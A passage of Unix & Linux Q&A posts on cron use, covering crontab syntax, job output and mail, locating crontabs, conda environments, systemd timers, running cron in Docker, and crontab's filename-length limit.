set +f
fi
but this gets complicated enough to build a separate script around that cron task.
Other ideas
You could send the string via stdin to crontab (beware, this clears out any previous crontab entries):
echo "* 1 * * * some_command" | crontab -
This should even work right through ssh:
echo "* 1 * * * some_command" | ssh user@host "crontab -"
if you want to append to the file you could use this:
# on the machine itself
echo "$(echo '* 1 * * * some_command' ; crontab -l 2>&1)" | crontab -
# via ssh
echo "$(echo '* 1 * * * some_command' ; ssh user@host crontab -l 2>&1)" | ssh user@host "crontab -"
| Add something to crontab programmatically (over ssh) |
1,327,513,801,000 |
I'm not quite sure what the standard is for spelling cron. Does one capitalize the whole word? Just the "C"? All lowercase? Is there even a standard, or do you just spell it in whatever way looks or suits best?
Some people say it's an acronym for "Command Run ON unix", others suggest it's derived from "chronos", the Greek word for "time", so I'm not sure.
|
The convention used in the Unix manuals, such as the cron man page from V7, is to capitalize the first letter of utility names when used at the beginning of a sentence, and to use their normal (almost always all-lowercase) spelling within sentences or when they're used in examples.
This convention is used even when the utility name is an acronym, such as dc - desk calculator.
User @Nobody pointed out in the comments that Debian's man pages always use the all-lowercase spelling, including at the beginning of a sentence. This appears to be an editorial decision; looking at the patch file in the Debian source for cron, patches are made to the original Vixie Cron man page, to change .I Cron to .I cron. This is also the case on Debian derivatives such as Ubuntu.
| Correct capitalization of "cron" |
1,327,513,801,000 |
Where does standard output from at and cron tasks go, given there
is no screen to display to?
It's not appearing in the directory the jobs were started from, nor in
my home directory.
How could I actually figure this out given that I don't know how to
debug or trace a background job?
|
From the cron man page:
When executing commands, any output is mailed to the owner of the
crontab (or to the user named in the MAILTO environment variable in
the crontab, if such exists). The children copies of cron running
these processes have their name coerced to uppercase, as will be seen
in the syslog and ps output.
So you should check your/root's mail, or the syslog (eg. /var/log/syslog).
| Where does the output of `at` and `cron` jobs go? |
1,327,513,801,000 |
A few years ago I setup a cron job to automatically ping a URL every minute as part of a monitoring system (that's oversimplification, but it'll do for this question). Because I'm a horrible person, I didn't document this anywhere.
Today, years later, I started having trouble with the application on the other end of the URL that's being pinged. I fixed it, but then realized, I have no idea where this cron job is coming from.
Is there a way to quickly search through or cat out all the crontabs on a particular system? I have root access so permissions aren't a problem. I've only ever been a user of cron, I've never looked too deeply at its implementation, but my *nix instincts say there has to be a group of text files somewhere that hold all the crontabs. I just don't know where they'd be, and if I dug into it I'd be afraid of finding some, but not all of them, or missing some weird nuance of the system
Also, I realize with root access I could
Get a list of all the users in the system
su as a user
crontab -l
Repeat with all the users
but I'm looking for something a little less manual (and looking to learn something about cron's implementation)
|
There are only a few places crontabs can hide:
/etc/crontab
/etc/cron.d/*
/etc/crond.{hourly,daily,weekly,monthly}/*
these are called from /etc/crontab, so maybe an asterisk on this
/var/spool/cron/* (sometimes /var/spool/cron/crontabs/*)
Be sure to check at as well, which keeps its jobs in /var/spool/at/ or /var/spool/cron/at*/
Also, instead of
su <user>
crontab -l
Just do this:
crontab -lu <user>
| How to Find a Fugitive Crontab |
1,327,513,801,000 |
I have a Anaconda Python Virtual Environment set up and if I run my project while that virutal environment is activated everything runs great.
But I have a cronjob configured to run it every hour. I piped the output to a log because it wasn't running correctly.
crontab -e:
10 * * * * bash /work/sql_server_etl/src/python/run_parallel_workflow.sh >> /home/etlservice/cronlog.log 2>&1
I get this error in the cronlog.log:
Traceback (most recent call last):
File "__parallel_workflow.py", line 10, in <module>
import yaml
ImportError: No module named yaml
That is indicative of the cronjob somehow not running the file without the virtual environment activated.
To remedy this I added a line to the /home/user/.bash_profile file:
conda activate ~/anaconda3/envs/sql_server_etl/
Now when I login the environment is activated automatically.
However, the problem persists.
I tried one more thing. I changed the cronjob, (and I also tried this in the bash file the cronjob runs) to explicitly manually activate the environment each time it runs, but to no avail:
10 * * * * conda activate ~/anaconda3/envs/sql_server_etl/ && bash /work/sql_server_etl/src/python/run_parallel_workflow.sh >> /home/etlservice/cronlog.log 2>&1
Of course, nothing I've tried has fixed it. I really know nothing about linux so maybe there's something obvious I need to change.
So, is there anyway to specify that the cronjob should run under a virutal environment?
|
Posted a working solution (on Ubuntu 18.04) with detailed reasoning on SO.
The short form is:
1. Copy snippet appended by Anaconda in ~/.bashrc (at the end of the file) to a separate file ~/.bashrc_conda
As of Anaconda 2020.02 installation, the snippet reads as follows:
# >>> conda initialize >>>
# !! Contents within this block are managed by 'conda init' !!
__conda_setup="$('/home/USERNAME/anaconda3/bin/conda' 'shell.bash' 'hook' 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__conda_setup"
else
if [ -f "/home/USERNAME/anaconda3/etc/profile.d/conda.sh" ]; then
. "/home/USERNAME/anaconda3/etc/profile.d/conda.sh"
else
export PATH="/home/USERNAME/anaconda3/bin:$PATH"
fi
fi
unset __conda_setup
# <<< conda initialize <<<
Make sure that:
The path /home/USERNAME/anaconda3/ is correct.
The user running the cronjob has read permissions for ~/.bashrc_conda (and no other user can write to this file).
2. In crontab -e add lines to run cronjobs on bash and to source ~/.bashrc_conda
Run crontab -e and insert the following before the cronjob:
SHELL=/bin/bash
BASH_ENV=~/.bashrc_conda
3. In crontab -e include at beginning of the cronjob conda activate my_env; as in example
Example of entry for a script that would execute at noon 12:30 each day on the Python interpreter within the conda environment:
30 12 * * * conda activate my_env; python /path/to/script.py; conda deactivate
And that's it.
You may want to check from time to time that the snippet in ~/.bashrc_conda is up to date in case conda updates its snippet in ~/.bashrc.
| cron job to run under conda virtual environment |
1,327,513,801,000 |
My current crontab looks like this:
00 00 * * 1-5 "/home/user/script.sh"
But it seems like it is not being triggered. All others are triggering fine except the one running at midnight.
What is the proper format for midnight? 00 00 or 00 24?
|
I believe 0 0 is the correct specification for midnight (no leading zeros, so in this case no double zero). From man crontab(5):
field allowed values
----- --------------
minute 0-59
hour 0-23
day of month 1-31
month 1-12 (or names, see below)
day of week 0-7 (0 or 7 is Sun, or use names)
If this is in the system crontab (i.e. /etc/crontab), make sure the field between the time specifications and the command is the user that the command is to be executed as.
Also make sure that the path to your command is fully specified, in the $PATH, or makes sense relative to $HOME.
| cron midnight 00 24 or 00 00? [closed] |
1,327,513,801,000 |
Somehow, I am finding it difficult to understand tweaking around * parameters with cron.
I wanted a job to run every hour and I used the below setting:
* */1 * * *
But it does not seem to do the job. Could someone please explain the meaning of above and what is needed for the job?
|
* means every.
*/n means every nth. (So */1 means every 1.)
If you want to run it only once each hour, you have to set the first item to something else than *, for example 20 * * * * to run it every hour at minute 20.
Or if you have permission to write in /etc/cron.hourly/ (or whatever it is on your system), then you could place a script there.
| Meaning of "* */1 * * *" cron entry? |
1,327,513,801,000 |
I need to start a cronjob every day, but an hour later each day. What I have so far works for the most part, except for 1 day of the year:
0 0 * * * sleep $((3600 * (10#$(date +\%j) \% 24))) && /usr/local/bin/myprog
When the day of year is 365 the job will start at 5:00, but the next day (not counting a leap year) will have a day of year as 1, so the job will start at 1:00. How can I get rid of this corner case?
|
My preferred solution would be to start the job every hour but have the script itself check whether it's time to run or not and exit without doing anything 24 times out of 25.
crontab:
0 * * * * /usr/local/bin/myprog
at the top of myprog:
[ 0 -eq $(( $(date +%s) / 3600 % 25 )) ] || exit 0
If you don't want to make any changes to the script itself, you can also put the "time to run" check in the crontab entry but it makes for a long unsightly line:
0 * * * * [ 0 -eq $(( $(date +\%s) / 3600 \% 25 )) ] && /usr/local/bin/myprog
| How can I start a cronjob 1 hour later each day? |
1,327,513,801,000 |
I want to know whether there is any easier way to run a job every 25 minutes. In cronjob, if you specify the minute parameter as */25, it'll run only on 25th and 50th minute of every hour
|
The command in crontab is executed with /bin/sh so you can use arithmetic expansion to calculate whether the current minute modulo 25 equals zero:
*/5 * * * * [ $(( $(date +\%s) / 60 \% 25 )) -eq 0 ] && your_command
cron will run this entire entry every 5 minutes, but only if the current minute (in minutes since the epoch) modulo 25 equals zero will it run your_command.
As others have pointed out, 1 day is not evenly divisible by 25 minutes, so this will not cause your_command to run at the same time every day, but it will run every 25 minutes.
| CronJob every 25 minutes |
1,327,513,801,000 |
Ubuntu 14.04
I don't understand the behaviour I'm seeing with setting up crontab for a service (no login) account (named curator).
When I'm logged in as root, this is what I get:
# crontab -u curator -l
The user curator cannot use this program (crontab)
But, when I switch to the user's account, it works fine:
# su -s /bin/bash curator
curator@host$ crontab -l
no crontab for curator
There is an empty /etc/cron.allow file and no /etc/cron.deny file on the system. According to man crontab:
If the /etc/cron.allow file exists, then you must be listed (one user per line) therein in order to be allowed to use this command. If the /etc/cron.allow file does not exist but the /etc/cron.deny file does exist, then you must not be listed in the /etc/cron.deny file in order to use this command.
I understand the error when I'm running the first command, but why does it allow me to run crontab when I explicitly switch to the user's account?
Adding the user to /etc/cron.allow makes both commands work fine.
|
I checked the crontab sources and found that if the user cannot open /etc/cron.allow (for instance after chmod 0 /etc/cron.allow), crontab thinks the user is allowed to use it (as if cron.allow did not exist).
But root can read any file, so crontab checking code works as expected. So I recommend you to check first permissions on /etc/cron.allow, and maybe SELinux/AppArmor audit logs.
| The user x cannot use this program (crontab) |
1,327,513,801,000 |
I need to write a timer unit for a machine which is turned off frequently (e.g. classical desktop setup). This timer unit needs to be activated regularly, but not very often (e.g. weekly, monthly).
I did find some approaches, but they all don't really fit:
According to the man pages, only the OnBootSec and the OnStartupSec directives will be activated if the configured point of time is in the past. I found as well some examples using a combination of these with OnActiveSec to define a regular event. The problem is: Every time the machine is booted the timer will activate the configured unit. If you got a timer which should run ONCE a week/month that is far too often. For example: I don't want to get my logs rotated three times a day!
Solutions with the OnCalendar directive. If the machine is powered off at the configured point in time (mostly midnight because if you omit the hour in the time specification it defaults to 00:00:00) the timer won't be activated after the next boot. That's at least how I got it. Is that right?
Are timer with calendar events activated right after the next startup if the configured time is in the past? If not, is there a workaround to get such a behaviour?
|
This feature has already been implemented in systemd (ver >= 212) using the Persistent= directive so you just need to insert Persistent=true in the unit file while using OnCalendar= directive to establish the date/time to run the job.
Persistent=
Takes a boolean argument. If true, the time when the service unit was last triggered is stored on disk. When the timer is activated, the service unit is triggered immediately if it would have been triggered at least once during the time when the timer was inactive. This is useful to catch up on missed runs of the service when the machine was off. Note that this setting only has an effect on timers configured with OnCalendar=.
| systemd - Timer units that mimic anacron behaviour |
1,327,513,801,000 |
I have the following cron jobs defined.
55 8 * * 3 /usr/bin/php /home/mark/dev/processes/customClient/events.php > /home/mark/dev/processes/customClient/events-`date +%Y-%m-%d --date='last Wednesday'`-`date +%Y-%m-%d`.csv
0 9 * * 3 /usr/bin/echo 'The csv for last week, trying my hand at automatiging this' | /usr/bin/mutt <emailaddress> -s 'Events from `date +%Y-%m-%d --date='last Wednesday'`-`date +%Y-%m-%d`' -a '/home/mark/dev/processes/customClient/events-`date +%Y-%m-%d --date='last Wednesday'`-`date +%Y-%m-%d`.csv'
It seems to work properly if I run it the above command directly from the command line. But when I checked the running of the script this morning I got an e-mail stating (I'm paraphrasing because I accidentally deleted them) that the back ticks weren't closed properly.
|
I strongly recommend putting any non-trivial cron jobs into their own shell script file, for many reasons:
Easier to debug: you can just run the script instead of copy pasting a long line, and with the right shebang line, it behaves much more predictably than if you had the same commands directly in the crontab
Easier to read: no need to make it a 200+ character one-liner, you can format it nicely so it's easy to read and understand for everyone
Add the script to version control
| What's wrong with these two cron jobs? [duplicate] |
1,327,513,801,000 |
I ssh to a server, and want to add some daily jobs (specifially to renew Kerberos tickets even when I log out and I still want my programs in screen or tmux continue to run) to cron. So I run crontab -e, and add the following,
00 00 * * * kinit -R
00 12 * * * kinit -R
When I save it, I am asked by the editor:
File Name to Write: /tmp/crontab.HMpG7V
Isn't it that the files in /tmp can be deleted by the OS? Especially after I log out of the server?
Where shall I store my crontab file? Can I save the crontab file under $HOME or some better space?
|
crontab -e opens a file in /tmp instead of the actual crontab so that it can check your new crontab for errors and prevent you from overwriting your actual crontab with those errors. If there are no errors, then your actual crontab will be updated. If crontab -e just wrote straight to your actual crontab, then you would risk all of your cronjobs failing to run due to a syntax error in your new crontab.
sudoedit, visudo, vipw, etc. operate on the same principle.
Don't worry, your actual crontab lives in a non-volatile location on disk.
| Shall I save my crontab file in /tmp? |
1,327,513,801,000 |
I was reading about the differences between cron and anacron and I realized that anacron, unlike cron is not a daemon. So I'm wondering how does it work actually if it's not a daemon.
|
It uses a variety of methods to run:
if the system is running systemd, it uses a systemd timer (in the Debian package, you’ll see it in /lib/systemd/system/anacron.timer);
if the system isn’t running systemd, it uses a system cron job (in /etc/cron.d/anacron);
in all cases it runs daily, weekly and monthly cron jobs (in /etc/cron.{daily,weekly,monthly}/0anacron);
it also runs at boot (from /etc/init.d/anacron or its systemd unit).
| How does anacron work if it's not a daemon? |
1,327,513,801,000 |
I'd like to run a nightly cron job that deletes all the files in a folder that haven't been accessed in a week or more. What is the most efficient way to do this in bash?
|
You want the find tool.
find folder -depth -type f -atime +7 -delete
(This will delete all files (only regular ones, no pipes, special devices, directories, symbolic links) in the given folder and all subdirectories (recursively) where the last access time is longer than 7 days ago.)
| How can I delete all files in a folder that haven't been accessed in a certain amount of time? |
1,327,513,801,000 |
I got a daily crontab task:
50 1 * * * sh /my_path/daily_task.sh > /tmp/zen_log 2>&1
This daily_task shell script will run some python scripts and produce a data file.
And it fails for two nights. But when I came in the morning, run the python scripts manually, I got the data file. Or I set a new crontab which only set the date to 0 10 * * *, and this crontab succeed, too.
So yesterday, I put > /tmp/zen_log 2>&1 in the cron task to get some error message.
And this morning, I got this error message in zen_log:
/my_path/daily_task.sh: line 19: 12364 Killed /usr/local/bin/python2.7 my_python_script.py 2 mix > mix_hc_$datestamp 2>&1
It seems some process has been killed? But what exactly does this line 19: 12364 Killed mean?
PS:
Today, one minute ago, when I manually run the python script, I got:
/usr/local/bin/python2.7 my_python_script.py 2 mix > mix_hc_$datestamp 2>&1
Killed
|
Often times when applications are being killed, it is always a good idea to take a quick look at your /var/log/messages file to see if the kernel is killing the process. The most common trigger (in my experience) has always been due to out-of-memory (OOM) errors, since my company primarily uses java applications, it is quite common for the devs to publish a bad code update that triggers an OOM event.
Scheduling tasks when your OS has the most available resources is probably why it is succeeding in the AM time slots and not in the PM when most people like to schedule taxing system jobs. Simple solutions to this are to either increase your systems resources, restrict resources allocated to your code or move around when your jobs are scheduled so they don't conflict.
| What does `line 19: 12364 Killed` mean in crontab error message? |
1,327,513,801,000 |
I'm running CentOS 5.5.
We have several cronjobs stored in /etc/cron.daily/ . We would like the email for some of these cronjobs to go to a particular email address, while the rest of the emails in /etc/cron.daily/ should go to the default email address (root@localhost).
Cronjobs in /etc/cron.daily/ are run from the /etc/crontab file. /etc/crontab specifies a 'MAILTO' field. Can I override this by setting MAILTO in my /etc/cron.daily/foo cronjob?
What's the best way to handle this?
|
Setting [email protected] in /etc/cron.daily/foo does not work. The script output is not sent to [email protected] .
The page at http://www.unixgeeks.org/security/newbie/unix/cron-1.html also suggests a simple solution:
The file /etc/cron.daily/foo now contains the following:
#!/bin/sh
/usr/bin/script 2>&1 | mailx -s "$0" [email protected]
This will send an email to '[email protected]' with the subject which is equal to the full path of the script (e.g. /etc/cron.daily/foo).
Here's what Unixgeeks.org says about this:
Output from cron
As I've said before, the output from
cron gets mailed to the owner of the
process, or the person specified in
the MAILTO variable, but what if you
don't want that? If you want to mail
the output to someone else, you can
just pipe the output to the command
mail. e.g.
cmd | mail -s "Subject of mail" user
Sometimes, I only want to receive the errors from a cronjob, not the stdout, so I use this trick. The syntax may look wrong at first glance, but rest assured it works. The following cronjob will send STDOUT to /dev/null, and will then handle STDERR via the pipeline.
doit 2>&1 >/dev/null | mailx -s "$0" [email protected]
Same thing, but send to syslog:
doit 2>&1 >/dev/null | /usr/bin/logger -t $ME
Also see my answer on ServerFault to Cronjob stderr to file and email
| /etc/cron.daily/foo : Send email to a particular user instead of root? |
1,327,513,801,000 |
As a non-root user, I want to run a background job when the system boots. It's sort of a service which doesn't require root privilege. Is there a way to do it?
One way is to put sudo -u user command in rc.local, but editing rc.local requires root privilege.
Another way is to launch it from cron every minute and check for any running instance, but firstly it wakes up the system unnecessarily and secondly, there can be race condition in checking running instances.
A third way is to run it in ~/.bash_profile, but I want to start it without user login.
|
You can use cron if your version has the @reboot feature. From man
5 crontab:
Instead of the first five fields, one of eight special strings may appear:
string meaning
------ -------
@reboot Run once, at startup.
…
You can edit a user-local crontab with the command crontab -e without root privileges. Then add the
following line:
@reboot /usr/local/bin/some-command
Now your command will be run once at boot time.
| How to autostart a background program by a non-root user? |
1,327,513,801,000 |
I am using nginx in docker. I have configured cron jobs to update SSL certificates and DNS registration. However the cron jobs are not running.
What have I done. I have created a Dockerfile based on arm32v7/nginx this intern is based on debian:stretch-slim. At first I installed cron, and assumed that it would run, but then discovered that the service was not started (there is no init subsystem installed, debian:stretch-slim is very minimal). So I added code to start cron. Now if I ask the container if cron is running it says yes.
#ctrl-alt-delor@raspberrypi:~/a_website/docker$
#↳ docker exec -it $(docker container ls | sed -nr -e 's/.*(website-stack.*)/\1/p') service cron status
[ ok ] cron is running.
However I am not seeing any logs from the task that I have added to cron.
If I run run-parts --report /etc/cron.daily, the my tasks get run, and produce log output. Therefore it still appears as if cron is not running.
#ctrl-alt-delor@raspberrypi:~/a_website/docker$
#↳ docker exec -it $(docker container ls | sed -nr -e 's/.*(website-stack.*)/\1/p') cat /proc/12/cmdline; echo
/usr/sbin/cron
So why is cron not running its jobs? What have I missed?
Dockerfile
FROM arm32v7/nginx
##add backports
COPY stretch-backports-source.list /etc/apt/sources.list.d/
##install cron and curl — so we can register dns regularly
RUN apt-get update &&\
apt-get install -y cron curl &&\
apt-get clean
##setup cron to register dns
COPY register-dns register-dns.auth register-dns-hostname /usr/local/bin/
COPY register-dns.cron /etc/cron.daily/1-register-dns
RUN chmod +x /usr/local/bin/register-dns /etc/cron.daily/1-register-dns
##add curtbot
RUN apt-get update && \
apt-get -t stretch-backports install -y python-certbot-nginx && \
apt-get clean
#add ssl port
EXPOSE 443 80
##custom entry point — needed by cron
COPY entrypoint /entrypoint
RUN chmod +x /entrypoint
ENTRYPOINT ["/entrypoint"]
CMD ["nginx", "-g", "daemon off;"] #:tricky: we seem to need to re-specify this
LABEL name="my-nginx" \
description="nginx + cron + curl + certbot + dns-registering"
entrypoint
#!/bin/sh
## Do whatever you need with env vars here ...
service cron start
# Hand off to the CMD
exec "$@"
/etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/cron.daily/1-register-dns
#!/bin/sh
date >> /var/log/register-dns
/usr/local/bin/register-dns >>/var/log/register-dns
|
I installed rsyslog to see what errors I was getting I got the following
(*system*) NUMBER OF HARD LINKS > 1 (/etc/crontab). A bit of searching told me that cron has a security policy to not work if there are lots of hard-links to its files. Unfortunately Docker's layered file-system makes files have lots of hard-links.
To fix it, I added touch /etc/crontab /etc/cron.*/*, to the start up script, before running cron. This dis-attaches if from the other file-instances.
The new entrypoint is
#!/bin/sh
#fix link-count, as cron is being a pain, and docker is making hardlink count >0 (very high)
touch /etc/crontab /etc/cron.*/*
service cron start
# Hand off to the CMD
exec "$@"
I have tested and it works
Summary
To get cron to work you will have to.
Install cron — if not installed
Add cron job to /etc/cron.daily/ (or weekly). Ensure that your script-name, has only letters, numbers, hyphens, no dots. (Don't ask) see cron job not running from cron.daily
Get the hardlink count of crons config files down to one: do touch /etc/crontab /etc/cron.*/* — (if in docker). I put it in the start-up script.
Start cron: service cron start — (If on a basic OS, with no init. As in a lot of base images for use in docker). I put it in the starts-up script.
The entrypoint script from this answer, and everything else from the question, will do it. Current project can be fetched with hg clone ssh://[email protected]/davids_dad/a_website
| Getting cron to work on docker |
1,327,513,801,000 |
I figure curl would do the job. I wrote in a script:
#!/bin/sh
function test {
res=`curl -I $1 | grep HTTP/1.1 | awk {'print $2'}`
if [ $res -ne 200 ]
then
echo "Error $res on $1"
fi
}
test mysite.com
test google.com
The problem here is no matter what I do I can't get it to stop printing the below to stdout:
% Total % Received % Xferd Average Speed Time Time Time Current
I want a cronjob to run this script and if it writes such a message then every time I run it I'll get an email because something has been printed to stdout in cron, even though the site may be fine.
How do I get the status code without getting junk into stdout? This code works except the bonus junk to the stdout preventing me from using it.
|
-s/--silent
Silent or quiet mode. Don't show progress meter
or error messages. Makes Curl mute.
So your res should look like
res=`curl -s -I $1 | grep HTTP/1.1 | awk {'print $2'}`
Result is Error 301 on google.com, for example.
| How do I get (only) the http status of a site in a shell script? |
1,327,513,801,000 |
I have a cron job running a php command like this:
php /path/to/script.php > dev/null
This should send only STDERR output to the MAILTO address. From what I gather the php script is not outputting any STDERR information even when its exit status is 1.
How can I get the output of the php command (STDOUT) and only send it to MAILTO if the exit status is non-zero?
|
php /path/to/script.php > logfile || cat logfile; rm logfile
which dumps standard output into logfile and only outputs it if the script fails (exits non-zero).
Note: if your script might also output to stderr then you should redirect stderr to stdout. Otherwise anything printed to stderr will cause cron to send an email even if the exit code is 0:
php /path/to/script.php > logfile 2>&1 || cat logfile; rm logfile
| Have cron email output to MAILTO based on exit status |
1,327,513,801,000 |
If I need a cronjob that runs at system level (i.e. not specific for a certain user) how do you suggest me to create it?
running crontab -e as root
appending it to /etc/crontab
creating a file defining the cronjob in /etc/cron.d/
creating a file defining the cronjob in /etc/cron.*ly/ (but only if such time interval fits my needs)
What worries me mostly is: which of these solutions will be possibly overwritten by a system update?
Additionaly I guess that if the job is long I should put it on a separate script file, for instance in /root/bin/. Do you agree?
|
Don't use crontab -e
I wouldn't put it in crontab -e as root. This is generally less obvious to other admins and is likely to get lost over time. Putting them in /etc/crontab you can specify exactly the time that you want them to run and you can specify a different user as well.
Alternative locations
If you do not care about running the script as a different user, and/or you just want the script to run weekly, daily, etc. then several distributions provide directories where scripts can be placed that will automatically get processed at a specific time.
For example under Redhat based distros:
$ ls -dl /etc/cron*
drwxr-xr-x. 2 root root 4096 Nov 29 11:06 /etc/cron.d
drwxr-xr-x. 2 root root 4096 Nov 29 11:06 /etc/cron.daily
-rw-------. 1 root root 0 Nov 23 07:42 /etc/cron.deny
drwxr-xr-x. 2 root root 4096 Nov 29 11:03 /etc/cron.hourly
drwxr-xr-x. 2 root root 4096 Nov 29 11:06 /etc/cron.monthly
-rw-r--r--. 1 root root 457 Sep 26 2011 /etc/crontab
drwxr-xr-x. 2 root root 4096 Sep 26 2011 /etc/cron.weekly
I'll often times put system level crons that I want to run at a specific time in /etc/cron.d instead of /etc/crontab, especially if they're more complex scripts.
I prefer using the directories under /etc/cron* because they're a much more obvious place that other system administrators will know to look and the files here can be managed via packages installations such as rpm and/or apt.
Protecting entries
Any of the directories I've mentioned are designated for putting scripts that will not get destroyed by a package manager. If you're concerned about protecting a crontab entry, then I would definitely not put it in the /etc/crontab file, and instead put it as a proper script in one of the /etc/cron* directories.
| Where to put system cronjobs? |
1,324,046,017,000 |
I believe that if there is any output from a cronjob it is mailed to the user who the job belongs to. I think you can also add something like [email protected] at the top of the cron file to change where the output is sent to.
Can I set an option so that cron jobs system-wide will be emailed to root instead of to the user who runs them? (i.e. so that I don't have to set this in each user's cron file)
|
Check /etc/crontab file and set MAILTO=root in there. Might also need in /etc/rc file
crond seems to accept MAILTO variable, I guess I am not sure completely but its worth a try changing the environment variable for crond before it is started. Like in /etc/sysconfig/crond or /etc/rc.d/init.d/crond script which sources the earlier file.
Example:
[centos@centos scripts]$ strings /usr/sbin/crond | grep -i mail
ValidateMailRcpts
MailCmd
cron_default_mail_charset
usage: %s [-n] [-p] [-m <mail command>] [-x [
CRON_VALIDATE_MAILRCPTS
mailed %d byte%s of output but got status 0x%04x
[%ld] no more grandchildren--mail written?
MAILTO
/usr/sbin/sendmail
mailcmd too long
[%ld] closing pipe to mail
MAIL
| Can I change the default mail recipient on cron jobs? |
1,324,046,017,000 |
I've tried eliminating many of the common errors,
ensuring that the PATHs are available for cron
there is an endline at the end of crontab file
the timezone is set-up by:
cd /etc
cp /usr/share/zoneinfo/Asia/Singapore /etc/localtime
Running date in bash, I get:
Tue Sep 17 15:14:30 SGT 2013
In order to check if cron is using the same time,
* * * * * date >> date.txt
is giving the same date output in date.txt.
This is the script I'm trying to execute:
event.sh:
#!/usr/bin/env bash
echo data > /root/data.txt
Using crontab -e, the line below works,
* * * * * /bin/bash /root/event.sh >/tmp/debug.log 2>&1
15 * * * * /bin/bash /root/event.sh >/tmp/debug.log 2>&1
However, when I tried some other arguments, hoping it would run at 2.50pm:
50 14 * * * /bin/bash /root/event.sh >/tmp/debug.log 2>&1
or
50 14 * * * (cd /root ; ./event.sh >/tmp/debug.log 2>&1)
it will no longer work. Seems like there is a problem with my hour argument. Nothing could be found in the /tmp/debug.log file either.
SOLUTION:
It turned out I have to restart the cron service after making changes to TZ.
|
First off, the odds that you are hitting a bug that causes one field to be incorrectly considered seems exceptionally low. It's more likely to be a misunderstanding of what's going on and what cron expects.
In this case, we found out in the comments to the question that it was very likely a timezone related issue. For this, you would:
Add an entry like * * * * * date to the crontab
Remove (or comment out) any TZ assignment from the crontab
This forces date to run with the time zone setting of the invoker, which means the cron daemon. Look at the output; it will show what time zone cron is using internally, and thus highly likely which time zone it wants its time fields in. If you have a TZ assignment in the crontab, it is easily possible that the TZ environment variable assignment is passed through to the invoked commands but cron itself uses some other time zone. By commenting out or removing the TZ assignment, you avoid this ambiguity.
Also note that any changes to the system global timezone settings (including e.g. /etc/localtime) almost certainly require at least a restart of the cron daemon, and possibly (though unlikely) a system reboot to take full effect. Editing the TZ assignment in the crontab should not require a reload of the cron daemon, as it should detect that the file has been changed and reload it automatically.
| Cron job does not fire up after a timezone change |
1,324,046,017,000 |
I have jobs that I want to run hourly, but not necessarily at the same time, which I think
0 * * * * job
Means run at the 0 minute of every hour on the dot.
I know I can also use
@hourly job
What is the difference if any?
How can I schedule Jobs to run Hourly, but not all at the same time?
|
From crontab(5):
@hourly: Run once an hour, ie. "0 * * * *".
So it's strictly the same.
To run a job at a varying point in the hour (or multiple jobs, to spread the load) you can sleep for a random amount of time before starting the job:
@hourly sleep $((RANDOM / 10)); dowhatever
This sleeps for up to 3276 seconds (nearly an hour), then runs the job. So every time cron starts the job, it waits a different amount of time before actually starting.
| @hourly vs 0 * * * * - Cron - How to run jobs hourly, but at different times |
1,324,046,017,000 |
I am using the latest Linux Mint.
I was wondering if it's possible to create a special cronjob for a database backup.
In my /etc/cronjob file I have the following code:
# Minute Hour Day of Month Month Day of Week Command
# (0-59) (0-23) (1-31) (1-12 or Jan-Dec) (0-6 or Sun-Sat)
30 4 * * 1-6 /home/users/backup.sh
In my /home/users/backup.sh I have:
mysqldump -uroot -p MyDatabase > /home/users/backup_MyDB/full_myDB.sql
Instead of full_myDB.sql I would like to have something like 2014-04-04_full_myDB.sql where the date is added dynamically depending on the date we have.
If the SQL Backup file is older than one week I would like the cronjob to delete it automatically.
|
With GNU date (default on Linux Mint) you can do:
mysqldump -uroot -p MyDatabase >/home/users/backup_MyDB/$(date +%F)_full_myDB.sql
To delete files older than 1 week:
find /home/users/backup_MyDB -type f -mtime +7 -exec rm {} +
Although generally it is wise to see what you are deleting before you delete (at least when testing you script) for this just do:
find /home/users/backup_MyDB -type f -mtime +7
| cronjob for automatic DB backup to date prefixed file |
1,324,046,017,000 |
$ touch aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBB
$ crontab aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBB
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: No such file or directory
This behavior seems quite unusual (noticing how it also truncates the path in the error message). I'm using Debian bullseye 11.
Is this a bug, or is there a specific reason why crontab has such a peculiar limitation?
I'm not able to replicate it on the docker image here: https://hub.docker.com/r/willfarrell/crontab
|
The version of crontab from Cygwin prints an explanatory error message:
file=abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcd
touch "$file"
crontab "$file"
crontab: usage error: filename too long
echo "$file" | awk '{print length}'
108
The message addresses your concern, albeit without providing an explanation.
Unfortunately the version on Debian doesn't explain well:
crontab "$file"
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU: No such file or directory
echo 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU' | awk '{print length}'
99
However, the source code (apt-get source crontab) gives a massive clue in cron.h:
#define MAX_FNAME 100 /* max length of internally generated fn */
And then in crontab.c:
static char Filename[MAX_FNAME];
…
(void) strncpy (Filename, argv[optind], (sizeof Filename)-1);
Filename[(sizeof Filename)-1] = '\0';
In case it's not obvious from these snippets, there's a hard-coded 99 character limit on the length of the filename. I can't see a reason for this other than an arbitrary "that should be long enough". The proper approach would probably have been to use PATH_MAX+1, but the author(s) didn't do that. A comment notes that the code could have been written as early as 1988 (or as late as 1994), but quite possibly pre-POSIX where this constant was formalised.
